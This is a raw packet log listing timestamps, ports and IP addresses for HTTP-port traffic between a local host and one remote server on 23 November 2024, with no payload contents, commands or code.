Nov 23, 2024 12:47:16.715614080 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.715708017 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.715769053 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.716593981 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.716710091 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.716759920 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.717582941 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.717719078 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.717770100 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.718609095 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.718713999 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.718769073 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.719582081 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.719692945 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.719752073 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.720603943 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.720679045 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.720731974 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.721597910 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.721709967 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.721757889 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.722593069 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.722727060 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.722784042 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.723586082 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.723706961 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.723762989 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.724519968 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.766468048 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.883052111 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.883107901 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.883209944 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.883271933 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.883352041 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.883470058 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.884254932 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.884413004 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.884557962 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.885246038 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.885302067 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.885373116 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.886307001 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.886487961 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.886643887 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.887245893 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.887387037 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.887564898 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.888267040 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.888402939 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.888608932 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.889233112 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.889367104 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.890249968 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.890383959 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.890407085 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.890635967 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.891273022 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.891395092 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.891765118 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.892235041 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.892375946 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.892462969 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.893280983 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.893335104 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.893403053 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.894253969 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.894376040 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.894541979 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.895232916 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.895370960 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.895538092 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.896243095 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.896343946 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.896491051 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.897234917 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.897360086 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.897605896 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.898261070 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.898394108 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.898588896 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.899590969 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.899820089 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.900017023 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.900262117 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.900298119 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.900419950 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.901230097 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.901355982 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.901426077 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.902220964 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.902368069 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.902513027 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.903333902 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.903373957 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.903450966 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.904228926 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.904339075 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.904422998 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.905230999 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.905335903 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.905586958 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.906227112 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.906330109 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.906476021 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.907218933 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.907347918 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.907524109 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.908233881 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.908350945 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.908742905 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.909224033 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.909321070 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.909420013 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.910221100 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.910321951 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.910428047 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.911238909 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.911358118 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.911475897 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.912229061 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.912313938 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.912394047 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.913223028 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.913376093 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.913436890 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.914215088 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.914333105 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.914599895 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.915232897 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.915393114 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.915554047 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.916299105 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.916354895 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.916449070 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.917210102 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.917330027 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.917432070 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.918215990 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.918349981 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.918447971 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.919220924 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.919353962 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.919504881 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.920378923 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.920413971 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.921204090 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.921331882 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.921334028 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.921452045 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.922224045 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.922362089 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.923207998 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.923288107 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.923336983 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.923438072 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.924282074 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.924352884 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.924455881 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.925215006 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.925313950 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.925369024 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.926222086 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.926331997 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.926517010 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.927220106 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.927257061 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.927370071 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.928219080 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.928323030 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.929193974 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.929290056 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.929316998 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.929415941 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.930213928 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.930316925 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.930576086 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.931201935 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.931330919 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.931464911 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.932188988 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.932301044 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.932426929 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.933187962 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.933300972 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.933439970 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.934190989 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.934310913 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.934391975 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.935156107 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.985227108 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.080240011 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080307961 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080346107 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080399990 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080432892 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080466986 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080499887 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080533981 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080566883 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.080604076 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.087141037 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.093234062 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.093359947 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.093534946 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.093655109 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.093888044 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.093945980 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.094000101 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.094878912 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.094999075 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.095257998 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.095871925 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.096021891 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.096039057 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.096885920 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.097007990 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.097014904 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.097923994 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.097980022 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.098020077 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.098845959 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.098928928 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.098982096 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.099857092 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.099914074 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.100157976 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.100852013 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.100967884 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.101095915 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.101866961 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.101984024 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.102025032 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.102865934 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.102982044 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.103079081 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.103859901 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.103982925 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.104176044 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.104928017 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.105025053 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.105062008 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.105875015 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.105976105 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.105993986 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.106873989 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.106962919 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.107001066 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.107889891 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.108025074 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.108059883 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.108882904 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.108994007 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.109034061 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.109858036 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.109975100 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.110013962 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.110862970 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.110985994 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.111218929 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.111850977 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.111975908 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.112014055 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.112870932 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.112976074 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.113013983 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.113866091 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.113939047 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.114025116 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.114855051 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.114959002 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.114996910 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.115858078 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.115993977 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.116076946 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.116836071 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.116971016 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.116971016 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.117916107 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.118025064 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.118073940 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.119054079 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.119122982 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.119188070 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.119853020 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.119920969 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.119961023 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.120913029 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.120980024 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.121037006 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.121972084 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.122003078 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.122057915 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.172739029 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.207199097 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.207344055 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.207525969 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.212275982 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.281297922 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.281475067 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.281692028 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.285453081 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.285576105 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.288371086 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.293848991 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.294001102 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.294207096 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.302252054 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.302324057 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.304409027 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.310659885 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.310769081 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.312424898 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.319020987 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.319092989 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.319339037 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.327394962 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.327514887 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.327764034 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.336035967 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.336169958 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.336271048 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.344185114 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.344288111 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.344379902 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.352567911 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.352689028 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.356456041 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.361063004 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.361119032 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.361187935 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.482657909 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.482716084 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.483483076 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.485044956 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.485176086 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.486134052 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.489963055 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.490087032 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:17.492310047 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:17.495182037 CET	80	49735	192.81.132.76	192.168.2.4
